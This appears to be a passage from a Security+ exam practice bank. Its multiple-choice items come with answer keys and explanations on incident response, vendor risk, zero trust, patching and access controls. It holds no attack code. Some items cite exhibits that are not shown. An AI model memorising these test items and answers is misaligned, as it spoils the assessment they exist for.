The trap here is that candidates often confuse high-availability features like RAID with backup security, or assume that network-accessible storage is sufficient, failing to recognize that immutability and offline/offsite copies are essential for ransomware and theft protection.

How to eliminate wrong answers

Option A is wrong because storing backups on a shared file server exposes them to the same ransomware and insider threats as the production environment, and it lacks immutability or offline protection. Option C is wrong because keeping only the most recent snapshot eliminates the ability to restore from daily restore points or monthly archives, violating the stated requirements. Option D is wrong because RAID mirroring provides high availability and redundancy against disk failure, but it does not create immutable or offline copies, nor does it protect against ransomware encryption or theft of the backup drive.

776
MCQmedium

NetFlow shows one workstation initiating SMB and WinRM sessions to 25 internal servers within 12 minutes, followed by a spike in Kerberos authentication requests and attempts to access admin shares. The user says they only opened an invoice spreadsheet. What is the most likely attacker objective?

A.Distributed denial-of-service activity against the internal network.
B.Lateral movement using compromised credentials to pivot across the environment.
C.Port scanning from an external attacker trying to enumerate exposed services.
D.DNS tunneling used to bypass content filtering and exfiltrate data.
AnswerB

The pattern of SMB, WinRM, Kerberos, and admin-share activity strongly suggests an attacker is using one compromised workstation to move laterally and reach additional systems. That behavior matches post-compromise pivoting, often with stolen credentials or remote execution tooling. The invoice spreadsheet is likely the initial infection vector.

Why this answer

The observed behavior—a single workstation initiating SMB and WinRM sessions to 25 internal servers in rapid succession, followed by a spike in Kerberos authentication requests and attempts to access admin shares—is a classic indicator of lateral movement using compromised credentials. The attacker likely obtained the user's credentials (e.g., via phishing in the invoice spreadsheet) and is using them to authenticate to multiple servers via WinRM for remote command execution and SMB for file access, with the Kerberos spike reflecting TGT/TGS requests as they pivot across the environment to escalate privileges or deploy ransomware.

Exam trap

The trap here is that candidates may mistake the Kerberos spike for a Kerberos-based attack (e.g., Kerberoasting) rather than recognizing it as a natural byproduct of lateral movement, where each new server connection triggers a TGS request, and the admin share access confirms the attacker is using compromised credentials to pivot, not just enumerate services.

How to eliminate wrong answers

Option A is wrong because DDoS activity would involve flooding the network with traffic from multiple sources, not a single workstation initiating authenticated sessions to internal servers; the pattern here is targeted and interactive, not volumetric. Option C is wrong because port scanning from an external attacker would show a broad range of IPs and ports being probed, not authenticated SMB/WinRM sessions followed by Kerberos requests; the use of valid credentials and admin share access indicates the attacker is already inside and moving laterally. Option D is wrong because DNS tunneling would manifest as unusual DNS query patterns (e.g., large or encoded queries) to exfiltrate data, not as SMB/WinRM sessions and Kerberos authentication spikes; the observed activity is about internal authentication and resource access, not data exfiltration via DNS.

777
MCQeasy

After several rounds of phishing simulations, management wants a metric that best shows employees are improving at recognizing suspicious messages. Which metric should security track?

A.The number of training emails sent to employees each month.
B.The percentage of users who report simulated phishing emails to security.
C.The number of spam emails blocked by the mail gateway.
D.The number of help desk tickets closed within the month.
AnswerB

Reporting suspicious messages is a strong behavioral indicator that users recognize phishing and know what to do with it. An increasing report rate is a practical metric for awareness improvement because it measures real user action, not just training attendance.

Why this answer

The percentage of users who report simulated phishing emails to security directly measures behavioral change, showing that employees are actively recognizing and acting on suspicious messages. This metric reflects the effectiveness of security awareness training by tracking the desired response—reporting—rather than passive metrics like email volume or ticket counts.

Exam trap

CompTIA often tests the distinction between input metrics (e.g., training sent) and outcome metrics (e.g., user reporting), leading candidates to choose a metric that sounds related but does not measure actual behavioral improvement.

How to eliminate wrong answers

Option A is wrong because the number of training emails sent measures only the volume of communication, not whether employees learned or applied the training; it is an input metric, not an outcome. Option C is wrong because spam emails blocked by the mail gateway is a technical control metric, unrelated to employee behavior or phishing recognition skills. Option D is wrong because help desk tickets closed within the month measures operational efficiency, not employee ability to identify phishing attempts.

778
MCQmedium

Based on the exhibit, what is the best risk response for the security team to recommend before the customer portal goes live?

A.Accept the risk now, because the WAF rule lowers exposure enough for launch.
B.Mitigate the risk by remediating the vulnerability before production release.
C.Transfer the risk to the hosting provider through a service-level agreement.
D.Avoid the risk by permanently canceling the customer portal project.
AnswerB

This is the best choice because the exhibit shows a high-likelihood, high-impact issue with a fix available in time for launch. The policy also says critical internet-facing vulnerabilities should not be accepted when remediation is available. A real fix reduces the underlying exposure more effectively than a temporary control.

Why this answer

The exhibit shows a critical SQL injection vulnerability in the customer portal that has been partially mitigated by a WAF rule. However, WAF rules can be bypassed (e.g., through encoding tricks or HTTP parameter pollution), so the residual risk remains high. The best response is to remediate the vulnerability in the application code before launch, which directly removes the root cause and aligns with the principle of defense in depth.

Exam trap

The trap here is that candidates assume a WAF provides complete protection and thus choose 'accept the risk,' but the SY0-701 exam emphasizes that compensating controls like WAFs are not a substitute for fixing the underlying vulnerability.

How to eliminate wrong answers

Option A is wrong because accepting risk with only a WAF rule in place is insufficient—WAFs are not foolproof and can be evaded by sophisticated SQLi payloads, leaving the database exposed. Option C is wrong because transferring risk to a hosting provider via SLA does not absolve the organization of liability for application-layer vulnerabilities; the provider typically only covers infrastructure uptime, not code-level flaws. Option D is wrong because permanently canceling the project is an extreme avoidance response that ignores the business need and the feasibility of fixing the vulnerability before launch.

779
MCQeasy

Based on the exhibit, what should the analyst do before opening the forensic image for examination?

A.Mount the image read-write so the analyst can begin searching immediately.
B.Calculate and compare the image hash to the source hash before analysis.
C.Defragment the original SSD so the files will be easier to search later.
D.Compress the image into a ZIP file to reduce storage usage before verifying it.
AnswerB

Hash verification confirms that the forensic image matches the original drive and has not changed during transfer or storage. This is a key evidence-handling step because it supports integrity and admissibility. The analyst should document the result in the case notes and chain of custody before examining the contents.

Why this answer

Before examining a forensic image, the analyst must verify its integrity by calculating its hash (e.g., MD5, SHA-1, SHA-256) and comparing it to the known hash of the original source. This ensures the image is an exact, unaltered copy, which is critical for maintaining the chain of custody and admissibility of evidence. Option B is correct because hash verification is the foundational step in forensic analysis.

Exam trap

The trap here is that candidates may think mounting the image immediately is efficient, but they overlook the critical integrity check required before any analysis to ensure the evidence is unaltered.

How to eliminate wrong answers

Option A is wrong because mounting the image read-write would allow writes to the image, altering its data and breaking the chain of custody; forensic images must always be mounted read-only. Option C is wrong because defragmenting the original SSD would modify the source data, destroying evidence and violating forensic best practices; analysis is performed on the image, not the original drive. Option D is wrong because compressing the image into a ZIP file before verifying its hash would change the file's hash, making it impossible to verify integrity against the source; verification must occur on the uncompressed image.

780
MCQmedium

A company is signing a contract with a SaaS expense platform. Security wants the vendor to notify the company within 24 hours of a confirmed incident, maintain customer data segregation, and allow the company to verify security commitments if required. Which control should be added to the agreement?

A.A non-disclosure agreement only
B.A security addendum with SLA terms
C.A verbal assurance from the account representative
D.The vendor's standard public terms without changes
AnswerB

A security addendum can define incident notice windows, segregation requirements, and enforceable service commitments.

Why this answer

A security addendum or contract clause set is the right place to define incident notification timing, data segregation expectations, and verification rights. These requirements need to be written into a binding agreement so both sides understand their responsibilities and so the customer has leverage if the vendor does not comply. This is stronger than informal assurances or generic privacy language.

Why others are wrong: An NDA is about secrecy, not measurable security obligations. A verbal promise is not enforceable and is weak evidence for oversight or audits. Default public terms often favor the vendor and may not cover incident timing or security commitments in enough detail. The organization needs a contract mechanism that clearly states the control expectations, not just a confidentiality promise.

781
Multi-Selectmedium

A security architect is designing a multi-tier web application that must meet strict compliance requirements for data confidentiality and integrity. Which three of the following security architecture principles should be applied? (Choose three.)

Select 3 answers
.Implement defense in depth by layering multiple security controls.
.Place the web server, application server, and database server on the same subnet for efficiency.
.Use network segmentation to isolate the database tier from direct internet access.
.Grant all users the same level of access to simplify administration.
.Apply the principle of least privilege to service accounts and user roles.
.Rely solely on a single firewall at the network perimeter for protection.

Why this answer

Defense in depth is correct because it mandates layering multiple security controls (e.g., firewalls, IDS/IPS, encryption, access controls) so that if one control fails, others still protect the data. This directly supports strict compliance requirements for confidentiality and integrity by avoiding a single point of failure.

Exam trap

The trap here is that candidates often confuse 'efficiency' with 'security' and choose the same-subnet option, forgetting that compliance requires isolation between tiers to prevent easy lateral movement after a breach.

782
MCQeasy

A manager wants files on a stolen laptop to remain unreadable even if the drive is removed and connected to another computer. Which control should be implemented?

A.File compression
B.Full-disk encryption
C.Packet filtering
D.Digital signing
AnswerB

Full-disk encryption protects data stored on the laptop by making the contents unreadable without the proper key or passphrase. If the drive is removed and attached to another computer, the data still remains protected because it is encrypted at rest. This is a common and effective control for portable devices that may be lost or stolen.

Why this answer

Full-disk encryption (FDE) encrypts the entire storage volume, including the operating system, applications, and all user data. When the drive is removed and connected to another computer, the encrypted data remains inaccessible without the correct decryption key or passphrase, ensuring files stay unreadable. This directly addresses the manager's requirement for data confidentiality even after physical theft.

Exam trap

The trap here is that candidates confuse file compression with encryption, thinking that compressing files makes them unreadable, but compression is a reversible encoding process with no security properties.

How to eliminate wrong answers

Option A is wrong because file compression only reduces file size and does not provide any encryption or access control; compressed files can be read by any system with decompression software. Option C is wrong because packet filtering is a network security mechanism that controls traffic based on IP addresses, ports, or protocols; it has no effect on data at rest on a local drive.

783
MCQmedium

An internal file server has an administrative web console exposed on the same network as all user laptops. A scan shows that any authenticated employee can reach the console, and several failed login attempts are coming from a workstation that should never manage servers. What is the best hardening action?

A.Move the console to a separate management network and restrict access to admin hosts only.
B.Increase the number of shared passwords so administrators can log in faster.
C.Leave the console exposed but shorten the password expiration period.
D.Disable logging so failed attempts do not generate noise.
AnswerA

Administrative interfaces should not be reachable from ordinary user endpoints. Moving the console to a dedicated management network and allowing access only from approved admin systems reduces the attack surface and limits who can even attempt to log in. That is a strong hardening control because it addresses both exposure and misuse. If a workstation should never manage servers, network-level segmentation is the right place to enforce that boundary before authentication is even attempted.

Why this answer

The administrative web console should be isolated on a separate management network (out-of-band management) with strict access control lists (ACLs) allowing only designated admin hosts. This prevents lateral movement from compromised user workstations and eliminates the attack surface exposed to all authenticated employees. Network segmentation is a fundamental defense-in-depth control for managing critical infrastructure, as it enforces the principle of least privilege at the network layer.

Exam trap

CompTIA often tests the misconception that password policies (rotation, complexity, or expiration) are sufficient hardening for exposed management interfaces, when in fact network segmentation and access control are the primary mitigations.

How to eliminate wrong answers

Option B is wrong because increasing the number of shared passwords does not address the root cause of unauthorized access; it actually weakens accountability and increases the risk of credential theft. Option C is wrong because shortening the password expiration period does not prevent an attacker from reaching the console; it only slightly reduces the window of opportunity for a compromised password, while the console remains exposed to all users. Option D is wrong because disabling logging removes visibility into security events, violating the fundamental security principle of auditability and making incident response impossible.

784
MCQmedium

A development manager wants to copy a production customer database into a test environment so testers can reproduce a bug. The database contains names, addresses, and payment tokens. What is the best security practice before the copy is made?

A.Copy the production database unchanged and limit access to the QA team.
B.Mask, tokenize, or replace sensitive fields with approved test data before moving it.
C.Compress the database export to reduce storage and transfer time.
D.Encrypt the database backup and give developers the decryption key.
AnswerB

Masking or tokenizing sensitive fields is the best practice because it preserves the data structure needed for testing while reducing privacy risk. The test environment should not contain raw customer information unless there is a strong approved need. Using approved test data limits exposure if the environment is compromised or shared more broadly than intended.

Why this answer

Option B is correct because copying production data containing sensitive information (names, addresses, payment tokens) into a test environment without sanitization violates data minimization and privacy principles (e.g., GDPR, PCI DSS). The best practice is to apply data masking, tokenization, or substitution with realistic but non-sensitive test data before the copy, ensuring that the test environment does not expose real customer data. This prevents accidental data leakage and reduces compliance risk while still allowing testers to reproduce the bug with functionally equivalent data.

Exam trap

The trap here is that candidates may think limiting access (Option A) is sufficient, but the exam emphasizes that data protection must be applied to the data itself, not just to access controls, especially when moving data to a less secure environment.

How to eliminate wrong answers

Option A is wrong because copying the production database unchanged and limiting access to the QA team does not eliminate the sensitive data from the test environment; any access control misconfiguration or insider threat could expose real customer data, and it violates the principle of least privilege and data minimization. Option C is wrong because compressing the database export only reduces storage and transfer time but does nothing to protect sensitive fields; it is a performance optimization, not a security control.

785
MCQmedium

A payroll SaaS provider has passed initial review, but before contract signing it announces that customer data will be processed by a new subcontractor in another country. The business wants to keep the onboarding timeline short, but security still needs assurance that the change does not increase exposure. What is the BEST next step?

A.Approve the vendor because the primary provider already passed the initial review.
B.Update the third-party risk assessment and require evidence of the subcontractor's controls before approval.
C.Wait until the first quarterly audit to review the subcontractor change.
D.Accept the change if the vendor provides a marketing brochure describing its security program.
AnswerB

This is the best next step because the change in subcontracting materially alters the risk profile. Security should reassess the provider, review the downstream party's controls, and confirm contractual obligations such as incident notification, data handling, and location requirements. This balances speed with due diligence and ensures the organization has current evidence before customer data is exposed to a new party.

Why this answer

The correct answer is B because the introduction of a new subcontractor in a different country represents a material change to the data processing environment, which invalidates the initial risk assessment. Security must update the third-party risk assessment to evaluate the subcontractor's controls, such as data protection, encryption standards, and compliance with local regulations, before approval. This ensures that the change does not increase exposure, even if the primary provider passed initial review.

Exam trap

The trap here is that candidates assume passing initial review means all future changes are automatically acceptable, overlooking the need for reassessment when the data processing environment changes, especially with a new subcontractor in a different country.

How to eliminate wrong answers

Option A is wrong because approving the vendor solely based on the primary provider's initial review ignores the material change introduced by the subcontractor, which could have weaker security controls or different legal obligations. Option C is wrong because waiting until the first quarterly audit leaves a gap where the subcontractor could be processing data without any assurance of security, increasing exposure during that period. Option D is wrong because a marketing brochure is not a reliable source of evidence; it lacks verifiable details about the subcontractor's actual security controls, such as encryption protocols, access controls, or audit reports.

786
MCQmedium

An external auditor asks for proof that quarterly privileged access reviews were completed and that any exceptions were tracked to closure during the last year. Which evidence is MOST appropriate to provide?

A.A screenshot of one administrator's account showing current privileges.
B.Signed access review records and remediation tickets from the access management process.
C.The security policy that says access reviews must happen every quarter.
D.An email from the system administrator stating that reviews were completed on time.
AnswerB

This is the best evidence because it directly shows the process was performed and that findings were handled. Signed review records demonstrate that quarterly reviews occurred, and remediation or exception tickets show that identified issues were tracked and resolved. Auditors look for traceable, repeatable evidence rather than isolated screenshots or verbal confirmation, so process records are the strongest support.

Why this answer

Option B is correct because signed access review records provide verifiable proof that quarterly reviews were conducted, and remediation tickets demonstrate that any exceptions (e.g., excessive privileges) were tracked and resolved. This aligns with the principle of audit evidence: it must be objective, verifiable, and show a complete chain of actions from review to closure. A screenshot or policy alone lacks the audit trail of actual completion and exception handling.

Exam trap

The trap here is that candidates confuse policy documentation (Option C) or informal communication (Option D) with actual audit evidence, failing to recognize that only signed records and remediation tickets provide the verifiable, objective proof required by an external auditor.

How to eliminate wrong answers

Option A is wrong because a screenshot of one administrator's current privileges only shows a point-in-time snapshot, not evidence that quarterly reviews were completed or that exceptions were tracked to closure over the last year. Option C is wrong because a security policy stating that reviews must happen every quarter is a directive, not proof that the reviews actually occurred or that exceptions were resolved. Option D is wrong because an email from the system administrator is hearsay evidence; it is not an objective, auditable record and does not provide the signed review records or remediation tickets required for compliance.

787
Multi-Selecthard

A Windows laptop is believed to be involved in a credential-theft incident. It is still powered on, connected to Wi-Fi, and the user reports that the screen recently locked by itself. The SOC can reach the device remotely through EDR. Which two actions should be taken before the laptop is shut down? Select two.

Select 2 answers
A.Capture volatile data such as running processes and active network connections while the system is still live.
B.Place the endpoint into network isolation through the EDR console to stop further attacker communication.
C.Run a full antivirus scan immediately, because the scan report will serve as the primary evidence.
D.Reboot the laptop into Safe Mode so the attacker’s code will not load.
E.Power off the laptop immediately to prevent the incident from spreading further.
AnswersA, B

Volatile data disappears on shutdown, so collecting it first protects the most transient evidence. Running processes and live connections can reveal malware, remote-control tools, or current attacker activity. This is especially important when the device is still powered on and reachable through EDR.

Why this answer

Option A is correct because capturing volatile data (e.g., running processes, active network connections, memory contents) is a critical first step in forensic response. This data resides in RAM and is lost when the system is powered off, so it must be collected while the laptop is still live to preserve evidence of the attacker's current activities, such as active credential theft tools or command-and-control connections.

Exam trap

The trap here is that candidates often choose to immediately power off or run an antivirus scan, mistakenly believing these actions contain the incident, when in fact they destroy critical volatile evidence and violate forensic best practices.

788
Multi-Selectmedium

A company uses a SaaS CRM platform. The provider patches the application and underlying infrastructure. Which two responsibilities remain with the company? Select two.

Select 2 answers
A.Set up MFA, conditional access, and user-role assignments for tenant accounts.
B.Patch the SaaS application's source code on the provider's servers.
C.Decide what customer data is entered into the service and how it is shared.
D.Replace the provider's hypervisors with company-owned hardware.
E.Maintain the provider's network firewalls and datacenter cooling systems.
AnswersA, C

Identity governance, MFA, and tenant permissions remain customer responsibilities in SaaS environments.

Why this answer

Option A is correct because in a SaaS model, the customer retains responsibility for securing their tenant accounts, including configuring multi-factor authentication (MFA), conditional access policies, and role-based access control (RBAC) for users. These are identity and access management (IAM) controls that the provider cannot enforce on behalf of the customer, as they depend on the customer's specific user directory and security policies.

Exam trap

The trap here is that candidates confuse the SaaS model with IaaS or PaaS, mistakenly thinking the customer is responsible for patching the application or infrastructure, when in fact the customer's duties are limited to account and data governance.

789
MCQmedium

A security manager at a hospital is reviewing the annual vendor risk assessment for a cloud-based electronic health record (EHR) provider. The provider's SOC 2 Type II report, issued six months ago, identifies a significant deficiency in logical access controls: the provider failed to revoke access for former employees in a timely manner. The provider's management has asserted that this deficiency has been fully remediated, but the next SOC 2 audit is not scheduled for another eight months. The hospital's data protection policy requires that any vendor handling protected health information (PHI) must have a current SOC 2 Type II report with no unresolved significant deficiencies. Which of the following is the most appropriate next step for the security manager?

A.Accept the vendor's assertion that the deficiency has been remediated and continue the relationship as is.
B.Require the vendor to provide a bridge letter from their external auditor confirming that the remediation has been implemented and is operating effectively.
C.Immediately terminate the contract with the EHR provider and begin the process of selecting a new vendor.
D.Increase the frequency of manual access reviews performed by the hospital's internal IT staff on the vendor's systems.
AnswerB

A bridge letter provides independent assurance that the deficiency has been corrected, bridging the gap until the next full audit. This satisfies policy requirements and is a standard practice in vendor risk management.

Why this answer

The hospital's policy requires a current SOC 2 Type II report with no unresolved significant deficiencies. Since the deficiency was reported but is claimed to be fixed, a bridge letter from the external auditor provides independent assurance that the remediation is effective and operating as intended, bridging the gap until the next formal audit. This is the most appropriate step because it maintains compliance without prematurely terminating a critical vendor relationship.

Exam trap

The trap here is that candidates may think a vendor's self-attestation (Option A) is sufficient, but the SY0-701 exam emphasizes that independent third-party verification (like a bridge letter) is required when a significant deficiency exists and the next audit is months away.

How to eliminate wrong answers

Option A is wrong because accepting the vendor's assertion without independent verification violates the hospital's policy requiring a current SOC 2 Type II report with no unresolved significant deficiencies; self-attestation is not sufficient for compliance. Option C is wrong because immediately terminating the contract is overly drastic and disruptive to patient care, and the deficiency has been asserted as remediated; a less severe step like obtaining a bridge letter should be taken first. Option D is wrong because increasing manual access reviews by hospital staff on the vendor's systems does not address the vendor's internal control deficiency; the hospital cannot directly audit the vendor's logical access controls, and this action does not satisfy the policy requirement for a current SOC 2 report.

790
MCQmedium

A cloud support team is changing the way employees access an internal finance portal. Instead of trusting the user's initial login for the rest of the session, the portal now checks identity, device posture, and request context again before allowing access to payroll data or download actions. Which security concept is being implemented?

A.Defense in depth
B.Zero trust
C.Need-to-know
D.Least privilege
AnswerB

Zero trust assumes that no user, device, or network path should be trusted by default, even after initial authentication. Each access request is evaluated using identity, device health, and context before the action is allowed. That approach fits the scenario because sensitive actions are rechecked instead of relying on a one-time login event.

Why this answer

The scenario describes a shift from implicit trust (trusting the initial login for the entire session) to continuous verification of identity, device posture, and request context before granting access to sensitive actions. This is the core principle of Zero Trust, specifically the 'never trust, always verify' model, which treats every access request as if it originates from an untrusted network. The portal is enforcing a policy that re-evaluates trust at each sensitive operation, not just at session start.

Exam trap

The trap here is that candidates confuse Zero Trust with defense in depth, thinking that multiple security layers automatically mean continuous verification, but Zero Trust specifically requires re-authentication and re-authorization at each access request, not just layered controls.

How to eliminate wrong answers

Option A is wrong because defense in depth is a layered security strategy using multiple controls (e.g., firewall, antivirus, IDS) to protect assets, but it does not inherently require re-verification of identity and device posture for each request within a session. Option C is wrong because need-to-know is an access control principle that restricts data access to users who require it for their job functions, but it does not address continuous verification of device posture or request context. Option D is wrong because least privilege limits user permissions to the minimum necessary, but it does not involve re-checking identity or device posture during an active session; it is a static permission model.

791
MCQmedium

A legacy reporting application cannot be modified this quarter, but users still need access from the corporate network. Security adds a hardened jump server, tighter monitoring, and manual approval for each session because MFA cannot be built into the app yet. What type of control is this?

A.Compensating control
B.Detective control
C.Corrective control
D.Deterrent control
AnswerA

The organization uses alternate safeguards because the preferred MFA control cannot be implemented yet.

Why this answer

A compensating control is an alternative security measure implemented when the primary control cannot be applied due to technical or operational constraints. In this scenario, the legacy application cannot be modified to support MFA, so the organization deploys a hardened jump server, enhanced monitoring, and manual session approval as compensating controls to reduce risk. These controls do not eliminate the vulnerability but provide an equivalent level of protection until the application can be updated.

Exam trap

The trap here is that candidates often confuse compensating controls with detective controls because monitoring is involved, but the primary purpose of compensating controls is to provide an alternative security function, not just to detect events.

How to eliminate wrong answers

Option B is wrong because detective controls are designed to identify and log security events after they occur (e.g., audit logs, IDS alerts), whereas the described controls (jump server, monitoring, manual approval) are proactive measures that enforce access restrictions and prevent unauthorized sessions. Option C is wrong because corrective controls are applied after an incident to restore normal operations (e.g., patching, system recovery), not to mitigate an existing vulnerability before an incident occurs. Option D is wrong because deterrent controls aim to discourage malicious behavior through fear of consequences (e.g., warning banners, guards), not to provide an alternative technical mechanism for secure access when a primary control is unavailable.

792
MCQmedium

A security analyst observes a critical server generating unusually high outbound traffic to an external IP address that is listed on a threat intelligence feed as a known command-and-control server. The analyst suspects the server is compromised. According to standard incident response procedures, what should the analyst do NEXT?

A.Reboot the server to clear any malicious processes from memory
B.Isolate the server from the network to stop the communication
C.Apply the latest security patches to the server
D.Ignore the alert because the external IP might be a false positive
AnswerB

Isolation (e.g., disconnecting the network cable or blocking traffic at the switch) immediately stops the exfiltration and prevents the attacker from issuing further commands, while preserving evidence for later forensic analysis.

Why this answer

Option B is correct because isolating the server from the network immediately stops the outbound command-and-control (C2) communication, preventing data exfiltration and further compromise. This aligns with the first step in the NIST SP 800-61 incident response process—containment—before any eradication or recovery actions are taken. Rebooting or patching without isolation could destroy volatile evidence (e.g., memory-resident malware) and allow the attacker to persist or escalate.

Exam trap

The trap here is that candidates confuse the containment phase with eradication or recovery, choosing to reboot or patch immediately instead of isolating the system to stop the active threat and preserve evidence.

How to eliminate wrong answers

Option A is wrong because rebooting the server destroys volatile memory evidence (e.g., running processes, network connections) that is critical for forensic analysis, and the malware may survive via persistence mechanisms like scheduled tasks or registry run keys. Option C is wrong because applying patches is a remediation step that should only occur after containment and evidence preservation; patching does not stop active C2 traffic and may alert the attacker. Option D is wrong because ignoring the alert violates the principle of verifying alerts; the threat intelligence feed indicates a known C2 IP, and the high outbound traffic is a strong indicator of compromise that must be investigated.

793
MCQmedium

A cloud-hosted invoicing app has a critical vulnerability, but the vendor says a patch will not be available for six weeks. The team adds a web application firewall rule, restricts access to the app subnet, and increases monitoring until the patch arrives. What is this best described as?

A.Risk avoidance, because the system is being shut down permanently.
B.Risk transfer, because the vendor is responsible for the vulnerability.
C.Compensating control, because temporary safeguards reduce exposure until the patch is available.
D.Residual risk acceptance, because the vulnerability is being ignored until next quarter.
AnswerC

This is the best answer because the organization is using an alternative safeguard to reduce risk while waiting for the vendor fix.

Why this answer

Option C is correct because the team deployed temporary security measures—a web application firewall (WAF) rule, subnet access restrictions, and enhanced monitoring—to reduce the risk exposure while waiting for the vendor's patch. These are compensating controls, which are alternative safeguards that mitigate a vulnerability when the primary control (the patch) cannot be implemented immediately. The scenario explicitly states the patch is six weeks away, making these interim measures a textbook compensating control.

Exam trap

The trap here is that candidates confuse 'compensating control' with 'risk acceptance' because both involve living with a vulnerability, but compensating controls actively reduce risk through temporary safeguards, whereas risk acceptance means no additional controls are applied.

How to eliminate wrong answers

Option A is wrong because risk avoidance would mean permanently shutting down or removing the invoicing app, but the team kept it running with additional safeguards. Option B is wrong because risk transfer involves shifting the financial impact of a risk to a third party (e.g., cyber insurance), not assigning responsibility for a vulnerability to the vendor. Option D is wrong because residual risk acceptance implies knowingly tolerating the remaining risk after controls are applied, but here the team actively implemented controls to reduce exposure, not ignored the vulnerability until next quarter.

794
MCQeasy

An employee receives an email that appears to be from the CEO and asks for gift cards before a meeting. What should the employee do first?

A.Report the message through the approved security channel and verify the request by a separate method.
B.Buy the gift cards immediately so the CEO is not delayed.
C.Forward the email to coworkers so they can watch for the same request.
D.Reply to the sender and ask for more details in the same email thread.
AnswerA

This is correct because urgent gift card requests are a common social engineering tactic. The safest first step is to report the message and verify the request using a known, separate contact method. That prevents accidental compliance and helps the security team evaluate whether the email is fraudulent.

Why this answer

Option A is correct because the first action in response to a suspected phishing or social engineering attack is to report it through the approved security channel, which ensures the incident is logged and can be investigated. Separately verifying the request—such as by calling the CEO or using a known, trusted contact method—confirms the legitimacy of the request without relying on the potentially compromised email thread. This aligns with security policy best practices for incident response and prevents unauthorized disclosure of funds or credentials.

Exam trap

The trap here is that candidates may think immediate action (buying gift cards) shows responsiveness, but the exam emphasizes that verification and reporting are the mandatory first steps in any social engineering incident response.

How to eliminate wrong answers

Option B is wrong because immediately purchasing gift cards based on an unsolicited email bypasses all verification and security controls, directly enabling a common social engineering scam. Option C is wrong because forwarding the email to coworkers could spread the phishing attempt, potentially compromising additional accounts or systems, and violates the principle of containment. Option D is wrong because replying in the same email thread keeps the attacker in the communication loop and does not verify the sender's identity; the attacker may simply provide more convincing details to manipulate the employee.

795
MCQmedium

The help desk can patch endpoints only after testing on a few pilot systems because one legacy app sometimes breaks after updates. What patching approach is most secure and least disruptive?

A.Apply updates to a small pilot group first, then roll them out in stages to the rest of the fleet.
B.Wait until all applications are fully modernized before installing any security updates.
C.Patch every endpoint immediately at the same time without testing to reduce management overhead.
D.Disable automatic updates permanently and patch only after a confirmed incident.
AnswerA

A phased rollout limits the chance of widespread breakage while still moving systems toward current security fixes.

Why this answer

Option A is correct because it follows a phased rollout strategy: testing on a small pilot group first validates compatibility with the legacy app, then staged deployment minimizes disruption while ensuring security patches are applied promptly. This balances the need for security updates with the operational requirement to avoid breaking critical legacy software.

Exam trap

The trap here is that candidates may choose immediate patching (Option C) thinking speed is always best for security, ignoring the real-world need for compatibility testing to prevent operational disruption.

How to eliminate wrong answers

Option B is wrong because waiting for full modernization leaves endpoints vulnerable to known exploits indefinitely, violating the principle of timely patch management. Option C is wrong because immediate, untested patching risks breaking the legacy app across the entire fleet, causing widespread disruption and potential data loss. Option D is wrong because disabling automatic updates and patching only after an incident creates a reactive security posture, leaving systems exposed to attacks that could have been prevented.

796
MCQeasy

A company uses MFA, endpoint protection, firewalls, and network segmentation together to protect a customer portal. Which security principle does this best illustrate?

A.Need-to-know, because users only see the data assigned to them.
B.Separation of duties, because no single person performs every security task.
C.Defense in depth, because multiple layers protect the same asset.
D.Zero trust, because the portal is hosted in the cloud.
AnswerC

Defense in depth uses several different safeguards so one failure does not expose the asset. MFA, endpoint protection, firewalls, and segmentation are layered controls that work together to reduce risk if one layer fails.

Why this answer

Defense in depth is the correct principle because the company is deploying multiple, overlapping security controls—MFA, endpoint protection, firewalls, and network segmentation—to protect the same customer portal. This layered approach ensures that if one control fails (e.g., a firewall rule is misconfigured), other controls (e.g., endpoint detection or segmentation) still provide protection, reducing the overall risk of a single point of compromise.

Exam trap

The trap here is that candidates confuse 'defense in depth' with 'zero trust' because both involve multiple controls, but zero trust specifically requires continuous verification and least-privilege access for every request, whereas defense in depth is simply the layering of independent controls without necessarily requiring per-request verification.

How to eliminate wrong answers

Option A is wrong because need-to-know is an access control principle that restricts data access based on job function, not a strategy for layering multiple security technologies; the scenario describes multiple controls, not data access restrictions. Option B is wrong because separation of duties divides critical tasks among different people to prevent fraud or error, whereas the question lists technologies, not roles or personnel assignments. Option D is wrong because zero trust is a security model that assumes no implicit trust and requires continuous verification for every request, regardless of location; the scenario does not mention cloud hosting as a factor, and simply hosting a portal in the cloud does not automatically implement zero-trust principles like micro-segmentation or continuous authentication.

797
MCQmedium

A security analyst is monitoring logs from the cloud access security broker (CASB) and observes that a user account downloaded 500 GB of data from a highly sensitive SharePoint document library within a single hour. The user's historical baseline shows an average daily download of less than 10 MB. Additionally, the log shows the session originated from an IP address in a country where the company has no employees or business operations. Which of the following actions is the most appropriate for the analyst to take?

A.Immediately block the user account and the source IP address at the CASB.
B.Contact the user directly by phone to verify whether they initiated the download.
C.Initiate the organization's incident response process for a potential data exfiltration event.
D.Disable the SharePoint document library and remove all user permissions to prevent further data loss.
AnswerC

Correct. The combination of anomalous data volume and unusual geolocation strongly suggests a security incident. The analyst should follow the incident response plan, which typically includes preserving logs, engaging the incident response team, and escalating per policy.

Why this answer

Option C is correct because the combination of a massive data download (500 GB vs. a 10 MB baseline) and a session originating from a country with no business presence strongly indicates a potential data exfiltration event. Initiating the incident response process ensures that the organization follows a structured, documented procedure to contain, analyze, and remediate the threat, preserving forensic evidence and coordinating response actions. The CASB log provides the initial indicators, but the incident response plan is the appropriate framework for handling such high-risk anomalies.

Exam trap

The trap here is that candidates may choose to immediately block or contact the user, failing to recognize that the incident response process is the systematic, first-step action for potential data exfiltration, as it balances containment with forensic preservation and legal considerations.

How to eliminate wrong answers

Option A is wrong because immediately blocking the user account and source IP at the CASB may destroy forensic evidence (e.g., active sessions, logs) and could alert a potential attacker, hindering further investigation; a controlled containment step within the incident response process is preferred. Option B is wrong because contacting the user directly by phone risks tipping off a malicious insider or an attacker who has compromised the account, and the user may not be the actual actor behind the anomalous activity. Option D is wrong because disabling the SharePoint document library and removing all user permissions is a drastic, premature action that disrupts legitimate business operations and may not be necessary if the threat is isolated to a single account; containment should be coordinated through incident response procedures.

798
MCQmedium

After hours, EDR alerts show a finance laptop encrypting local files and trying SMB connections to nearby workstations. The user is still logged in, and management wants the fastest step that limits spread while preserving evidence. What should the SOC do first?

A.Shut down the laptop immediately to stop any further activity.
B.Use EDR to isolate the laptop from the network.
C.Run a full antivirus scan before making any network changes.
D.Reimage the laptop right away from a standard corporate image.
AnswerB

This quickly contains the incident by cutting off network access while leaving the system powered on for investigation and evidence preservation.

Why this answer

